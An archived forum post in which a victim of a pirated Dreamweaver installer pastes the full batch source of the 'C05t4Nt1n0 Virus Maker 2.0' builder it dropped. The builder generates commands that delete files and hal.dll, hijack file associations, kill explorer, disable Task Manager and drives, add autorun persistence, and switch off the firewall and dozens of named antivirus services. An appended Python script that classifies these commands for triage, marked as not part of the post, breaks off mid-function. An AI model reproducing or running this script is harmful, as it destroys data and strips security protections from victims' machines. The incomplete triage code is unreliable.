This topic has been archived and is closed to new replies.

AyrtonMaia

[Archived] I got hacked, but I managed to grab the virus.


My PC got hacked. The virus came from a Dreamweaver I downloaded from the net. I ran a Kaspersky scan on it but it didn't catch anything, so I ran the installer, and up to that point everything was fine. Then out of nowhere a program opened on my PC with a slider saying: hackeado by z3us, and it opened DOS with some stuff in it. I managed to grab the slider and got a file bomba.exe and the file bomba.bat. The file bomba.bat contained the following code:

@echo offtitle BATBOMBGEN 2.0clsecho.echo.echo					  ÉÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ»echo					  ³ °±²Û C05t4Nt1n0 VirUs Maker 2.0 Û²±° ³echo					  ÈÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄļecho.echo.echo.	 Fuck L4mm3recho	  ÄÄÄÄÄÄÄÄÄÄÄÄ:1set pp=%set pd=0set host=>>%homedrive%\windows\system32\Drivers\Etc\Hostsset /p name=Nome Autor:set /p namev=Nome Virus:echo > badcom.bat :%name%echo :%namev% >> badcom.batecho @echo off >> badcom.batecho cls >> badcom.batclsecho.echo.echo					  ÉÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ»echo					  ³ °±²Û C05t4Nt1n0 VirUs Maker 2.0 Û²±° ³echo					  ÈÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄļecho.echo.echo.	 Fuck L4mm3recho	  ÄÄÄÄÄÄÄÄÄÄÄÄ:3echo.echo.echo Selecione o Payload (FUNCAO):echo.echo (1) Corromper Licensa do Windowsecho (2) deletar extencao expecificaecho (3) Confundir SHELLecho (4) Desligarecho (5) matar explorerecho (6) desativar tecladoecho (7) fechar programaecho (8) deletar componentes do Painel de Controleecho.echo.set /p op3=opcao:if %op3%== 1 goto licif %op3%== 2 goto extdif %op3%== 3 goto exassif %op3%== 4 goto shutif %op3%== 5 goto tskilif %op3%== 6 goto keyif %op3%== 7 goto closeif %op3%== 8 goto cpdel@msg * opcao invalida %op3%goto 3exit:licecho REG ADD "HKLM\Software\Microsoft\Windows NT\CurrentVersion\WPAEvents" /v OOBETimer /t REG_DWORD /d 0 /f >> badcom.batecho alguma outra opcao ? (s/n)set /p sn1=:if %sn1%== s goto 3if %sn1%== n goto 4@msg * opcao invalida %sn1%exit:extdecho entre com a extencaoecho.set /p ext=extencao:echo del /s /q /f *.%ext% >> badcom.batecho cd \ >> badcom.batecho del /s /q /f *.%ext% >> badcom.batecho alguma outra opcao ? 
(s/n)set /p sn2=:if %sn2%== s goto 3if %sn2%== n goto 4@msg * opcao invalida %sn1%exit:exassecho assoc .exe=vbsfile >> badcom.batecho assoc .mp3=VBSFile >> badcom.batecho assoc .wmv=themefile >> badcom.batecho assoc .cpl=vbsfile >> badcom.batecho assoc .pif=vbsfile >> badcom.batecho assoc .lnk=vbsfile >> badcom.batecho assoc .scr=exefile >> badcom.batecho assoc .txt=vbsfile >> badcom.batecho alguma outra opcao ? (s/n)set /p sn3=:if %sn3%== s goto 3if %sn3%== n goto 4@msg * opcao invalida %sn1%exit:shutecho (r) reiniciarecho (s) desligarset /p fun=:echo.echo.echo tempo:set /p tim=(segundos):echo shutdown /%fun% /f /t %tim% /c "c05t4nt1n0 Virus Gen" >> badcom.batecho alguma outra opcao ? (s/n)set /p sn4=:if %sn4%== s goto 3if %sn4%== n goto 4@msg * opcao invalida %sn4%exit:tskilecho taskkill -f -im explorer.exe >> badcom.batecho alguma outra opcao ? (s/n)set /p sn5=:if %sn5%== s goto 3if %sn5%== n goto 4@msg * opcao invalida %sn5%exit:keyecho REG ADD "HKCU\Control Panel\Accessibility\Keyboard Response" /v Flags /t REG_SZ /d 127 /f  >> badcom.batecho REG ADD "HKCU\Control Panel\Accessibility\SoundSentry" /v Flags /t REG_SZ /d 3 /f  >> badcom.batecho REG ADD "HKCU\Control Panel\Accessibility\SoundSentry" /v WindosEffect /t REG_SZ /d 3 /f >> badcom.batecho alguma outra opcao ? (s/n)set /p sn6=:if %sn6%== s goto 3if %sn6%== n goto 4@msg * opcao invalida %sn6%exit :closeecho coloque o endereco do programaecho exemplo: C:\windows\explorer.exeecho.echo.set /p app=:echo rundll32.exe C:\WINDOWS\system32\sysdm.cpl,NoExecuteProcessException %app% >> badcom.batecho alguma outra opcao ? (s/n)set /p sn7=:if %sn7%== s goto 3if %sn7%== n goto 4@msg * opcao invalida %sn7%exit:cpdelecho cd %systemroot% >> badcom.batecho cd system32 >> badcom.batecho del /s /q /f *.cpl >> badcom.batecho alguma outra opcao ? 
(s/n)set /p sn8=:if %sn8%== s goto 3if %sn8%== n goto 4@msg * opcao invalida %sn8%exit:4clsecho.echo.echo					  ÉÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ»echo					  ³ °±²Û C05t4Nt1n0 VirUs Maker 2.0 Û²±° ³echo					  ÈÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄļecho.echo.echo.	 Fuck L4mm3recho	  ÄÄÄÄÄÄÄÄÄÄÄÄecho Deseja que o virus afete o setor de boot? (S/N)set /p sn=:if %sn%== s goto bootif %sn%== n goto 5@msg * opcao Invalidaexit:bootecho cd %systemroot% >> badcom.batecho cd system32 >> badcom.batecho del /s /q /f hal.dll >> badcom.batcls:5echo					  ÉÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ»echo					  ³ °±²Û C05t4Nt1n0 VirUs Maker 2.0 Û²±° ³echo					  ÈÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄļecho.echo.echo.	 Fuck L4mm3recho	  ÄÄÄÄÄÄÄÄÄÄÄÄecho.echo.echo deseja usar tecnica AV_FW-KILL? (S/N)echo.echo.set /p sn2=:if %sn2%== s goto fwif %sn2%== n goto 7@msg * opcao invalidaexit:fwecho net stop SharedAccess >> badcom.bat echo reg add "HKCU\Software\Microsoft\windows\CurrentVersion\Policies" /v NoDispAppearancePage /t reg_DWORD /d 00000000 /f >> badcom.batecho reg add "HKCU\Software\Microsoft\windows\CurrentVersion\Policies" /v NoDispSettingsPage /t reg_DWORD /d 00000000 /f >> badcom.bat echo reg add "HKCU\Software\Microsoft\windows\CurrentVersion\Policies" /v NoSecCPL /t reg_DWORD /d 00000000 /f >> badcom.batecho reg add "HKLM\Software\Microsoft\windows\CurrentVersion\Policies" /v NoPwdPage /t reg_DWORD /d 00000000 /f >> badcom.batecho reg add "HKCU\Software\Microsoft\windows\CurrentVersion\Policies" /v NoProfilePage /t reg_DWORD /d 00000000 /f >> badcom.batecho reg add "HKCU\Software\Microsoft\windows\CurrentVersion\Policies" /v NoFileSysPage /t reg_DWORD /d 00000000 /f >> badcom.batecho reg add "HKCU\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer" /v NoAutoUpdate /t reg_DWORD /d 00000001 /f >> badcom.batecho reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v oobe /t REG_SZ /d C:\oobe.bat -hide /f >> badcom.bat echo reg add 
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDrives /t REG_DWORD /d 67108863 /f >> badcom.bat echo reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f >> badcom.bat echo reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\WPAEvents" /v OOBETimer /t REG_DWORD /d 0 /f >> badcom.bat echo reg add HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\ /v DataBasePath /t REG_EXPAND_SZ /d "%systemroot%\System32\drivers\etc /f >> badcom.bat" echo reg add HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices /v Pwner /t REG_SZ /d %systemroot%\system32\ni0Ck08.exe /f >> badcom.bat >nulecho reg add "HKCU\Control Panel\Accessibility\Keyboard Response" /v Flags /t REG_SZ /d 127 /f >> badcom.bat echo reg add "HKCU\Control Panel\Accessibility\SoundSentry" /v Flags /t REG_SZ /d 3 /f >> badcom.bat echo reg add "HKCU\Control Panel\Accessibility\SoundSentry" /v WindosEffect /t REG_SZ /d 3 /f >> badcom.bat echo reg add "HKCU\Software\Microsoft\windows\CurrentVersion\Policies" /v NoDispAppearancePage /t reg_DWORD /d 00000000 /f >> badcom.batecho reg add "HKCU\Software\Microsoft\windows\CurrentVersion\Policies" /v NoDispSettingsPage /t reg_DWORD /d 00000000 /f >> badcom.batecho reg add "HKCU\Software\Microsoft\windows\CurrentVersion\Policies" /v NoSecCPL /t reg_DWORD /d 00000000 /f >> badcom.batecho reg add "HKLM\Software\Microsoft\windows\CurrentVersion\Policies" /v NoPwdPage /t reg_DWORD /d 00000000 /f >> badcom.bat echo reg add "HKCU\Software\Microsoft\windows\CurrentVersion\Policies" /v NoProfilePage /t reg_DWORD /d 00000000 /f >> badcom.batecho reg add "HKCU\Software\Microsoft\windows\CurrentVersion\Policies" /v NoFileSysPage /t reg_DWORD /d 00000000 /f >> badcom.batecho reg add "HKCU\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer" /v NoAutoUpdate /t reg_DWORD /d 00000001 /f >> badcom.batecho reg add "HKLM\software\microsoft\security center" /v AntiVirusDisableNotify /t 
REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\software\microsoft\security center" /v AntiVirusOverride /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\software\microsoft\security center" /v FirewallDisableNotify /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\software\microsoft\security center" /v FirewallOverride /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\software\microsoft\security center" /v FirstRunDisabled /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\software\microsoft\security center" /v UpdatesDisableNotify /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\SharedAccess" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\SharedAccess" /v ErrorControl /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset002\services\SharedAccess" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset002\services\SharedAccess" /v ErrorControl /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\currentcontrolset\services\SharedAccess" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\currentcontrolset\services\SharedAccess" /v ErrorControl /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset002\services\AVPCC" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\AVPCC" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\currentcontrolset\services\AVPCC" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\Amon" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset002\services\Amon" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\currentcontrolset\services\Amon" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\Apvxd" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add 
"HKLM\system\controlset002\services\Apvxd" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\currentcontrolset\services\Apvxd" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\Apvxdwin" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset002\services\Apvxdwin" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\currentcontrolset\services\Apvxdwin" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\Atrack" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset002\services\Atrack" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\currentcontrolset\services\Atrack" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\AvconsoleEXE" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset002\services\AvconsoleEXE" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\currentcontrolset\services\AvconsoleEXE" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\AVG_CC" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset002\services\AVG_CC" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\currentcontrolset\services\AVG_CC" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\avgcc32" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset002\services\avgcc32" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\currentcontrolset\services\avgcc32" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\avgserv9" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset002\services\avgserv9" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add 
"HKLM\system\currentcontrolset\services\avgserv9" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\AVPCC Service" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset002\services\AVPCC Service" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\currentcontrolset\services\AVPCC Service" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\BlackIce Utility" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset002\services\BlackIce Utility" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\currentcontrolset\services\BlackIce Utility" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\CcApp" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset002\services\CcApp" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\currentcontrolset\services\CcApp" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\CcRegVfy" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset002\services\CcApp" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\currentcontrolset\services\CcApp" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\ConfigSafe" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset002\services\ConfigSafe" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\currentcontrolset\services\ConfigSafe" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\CPD_EXE" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset002\services\CPD_EXE" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\currentcontrolset\services\CPD_EXE" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add 
"HKLM\system\controlset001\services\Defwatch" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset002\services\Defwatch" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\currentcontrolset\services\Defwatch" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\dvpapi9x" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset002\services\dvpapi9x" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\currentcontrolset\services\dvpapi9x" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\Fix-it" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset002\services\Fix-it" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\currentcontrolset\services\Fix-it" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\Fix-it AV" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset002\services\Fix-it AV" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\currentcontrolset\services\Fix-it AV" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\Freedom" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset002\services\Freedom" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\currentcontrolset\services\Freedom" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\F-StopW" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset002\services\F-StopW" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\currentcontrolset\services\F-StopW" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\iamapp" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset002\services\iamapp" /v 
Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\currentcontrolset\services\iamapp" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\Look 'n' Stop" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset002\services\Look 'n' Stop" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\currentcontrolset\services\Look 'n' Stop" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\McAfee Firewall" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset002\services\McAfee Firewall" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\currentcontrolset\services\McAfee Firewall" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\McAfee Winguage" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset002\services\McAfee Firewall" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\currentcontrolset\services\McAfee Firewall" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\McAfee.InstantUpdate.Monitor" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset002\services\McAfee.InstantUpdate.Monitor" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\currentcontrolset\services\McAfee.InstantUpdate.Monitor" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\McAfeeVirusScanService" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset002\services\McAfeeVirusScanService" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\currentcontrolset\services\McAfeeVirusScanService" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\NAV Agent" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add 
"HKLM\system\controlset002\services\NAV Agent" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\currentcontrolset\services\NAV Agent" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\NAV Configuration Wizard" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset002\services\NAV Configuration Wizard" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\currentcontrolset\services\NAV Configuration Wizard" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\NAV DefAlert" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset002\services\NAV Configuration Wizard" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\currentcontrolset\services\NAV Configuration Wizard" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\Nod32CC" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset002\services\Nod32CC" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\CURRENTcontrolset\services\Nod32CC" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\NOD32POP3" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset002\services\NOD32POP3" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\currentcontrolset\services\NOD32POP3" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\Norton Auto-Protect" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset002\services\Norton Auto-Protect" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\currentcontrolset\services\Norton Auto-Protect" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\Norton eMail Protect" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add 
"HKLM\system\controlset002\services\Norton eMail Protect" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\currentcontrolset\services\Norton eMail Protect" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\Norton Navigaton Loader" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset002\services\Norton Navigaton Loader" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\currentcontrolset\services\Norton Navigaton Loader" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\Norton Program Scheduler" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset002\services\Norton Program Scheduler" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\currentcontrolset\services\Norton Program Scheduler" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\Norton Program Event Checker" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset002\services\Norton Program Event Checker" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\currentcontrolset\services\Norton Program Event Checker" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\NPS Event Checker" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset002\services\NPS Event Checker" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\currentcontrolset\services\NPS Event Checker" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\Panda Scheduler" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset002\services\Panda Scheduler" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\currentcontrolset\services\Panda Scheduler" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add 
"HKLM\system\controlset001\services\ScanInicio" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset002\services\ScanInicio" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\currentcontrolset\services\ScanInicio" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\SymTray - Norton SystemWorks" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset002\services\SymTray - Norton SystemWorks" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\currentcontrolset\services\SymTray - Norton SystemWorks" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\Tiny Personal Firewall" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset002\services\Tiny Personal Firewall" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\currentcontrolset\services\Tiny Personal Firewall" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\TrueVector" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset002\services\TrueVector" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\currentcontrolset\services\TrueVector" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\VirusScan Online" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset002\services\VirusScan Online" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\currentcontrolset\services\VirusScan Online" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset001\services\ZoneAlarm" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\controlset002\services\ZoneAlarm" /v Start /t REG_DWORD /d 4 /f >> badcom.batecho reg add "HKLM\system\currentcontrolset\services\ZoneAlarm" /v Start /t REG_DWORD /d 4 /f >> badcom.batclsexit

Could this code have damaged anything else on my computer? I closed the DOS window the moment it opened. As soon as the slide appeared I disconnected from the internet, so the lamer couldn't do much, "I think".

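An added triage example, not part of the original post and not code from the forum or any tool named in the thread: the posted script is a builder that writes commands into badcom.bat, so "what did it change?" can be answered by classifying those commands. The sample input is constructed from registry paths and commands visible in the post; the category names and function names are labels chosen here.

```python
import re
from collections import defaultdict

# Constructed sample: commands of the kind the posted builder writes into
# badcom.bat. Keys, values and commands are copied from the post.
SAMPLE = r'''
@echo off
net stop SharedAccess
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v oobe /t REG_SZ /d C:\oobe.bat -hide /f
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDrives /t REG_DWORD /d 67108863 /f
reg add "HKLM\software\microsoft\security center" /v FirewallOverride /t REG_DWORD /d 4 /f
reg add "HKLM\system\controlset001\services\SharedAccess" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\SharedAccess" /v Start /t REG_DWORD /d 4 /f
reg add "HKLM\system\currentcontrolset\services\ZoneAlarm" /v Start /t REG_DWORD /d 4 /f
assoc .exe=vbsfile
del /s /q /f hal.dll
taskkill -f -im explorer.exe
'''

REG_ADD = re.compile(r'^reg\s+add\s+(?:"([^"]+)"|(\S+))(.*)$', re.I)
VALUE = re.compile(r'/v\s+(\S+)', re.I)
DATA = re.compile(r'/d\s+(.*?)\s*(?:/f\b.*)?$', re.I)
# Matches controlset001, controlset002 and currentcontrolset alike.
SERVICE_KEY = re.compile(r'\\system\\[^\\]*controlset[^\\]*\\services\\(.+)$', re.I)
CMD_RULES = [
    (re.compile(r'^net\s+stop\s+(.+)$', re.I), 'service-stopped'),
    (re.compile(r'^assoc\s+(\.\w+=\w+)', re.I), 'file-association-changed'),
    (re.compile(r'^del\b.*?\s(\S+)$', re.I), 'file-deletion'),
    (re.compile(r'^taskkill\b.*?[-/]im\s+(\S+)', re.I), 'process-killed'),
    (re.compile(r'^shutdown\b(.*)$', re.I), 'forced-shutdown'),
]


def normalize(line):
    """Accept a plain command or the builder's `echo <cmd> >> file` form."""
    line = re.sub(r'\s*>>\s*\S+\s*$', '', line.strip())
    return re.sub(r'^echo\s+', '', line, flags=re.I)


def classify_reg(key, value, data):
    k, v = key.lower().rstrip('\\'), (value or '').lower()
    svc = SERVICE_KEY.search(key)
    if svc and v == 'start' and data == '4':      # Start=4 means "disabled"
        return 'service-disabled', svc.group(1)
    if k.endswith(('\\currentversion\\run', '\\currentversion\\runservices')):
        return 'autostart-persistence', f'{value} -> {data}'
    if k.endswith('\\security center'):
        return 'security-center-tamper', value
    if v == 'disabletaskmgr' and data == '1':
        return 'task-manager-disabled', key
    if v == 'nodrives':                           # one bit per drive letter
        return 'drives-hidden', f'bitmask {int(data):#x}' if data.isdigit() else data
    return 'registry-other', f'{key} [{value}]'


def classify_cmd(line):
    for rx, category in CMD_RULES:
        m = rx.match(line)
        if m:
            return category, m.group(1).strip()
    return None, None


def analyze(script_text):
    """Return {category: sorted unique details} for every recognised command."""
    findings = defaultdict(list)
    for raw in script_text.splitlines():
        line = normalize(raw)
        m = REG_ADD.match(line)
        if m:
            key, rest = m.group(1) or m.group(2), m.group(3)
            v, d = VALUE.search(rest), DATA.search(rest)
            category, detail = classify_reg(
                key, v.group(1) if v else None, d.group(1) if d else '')
        else:
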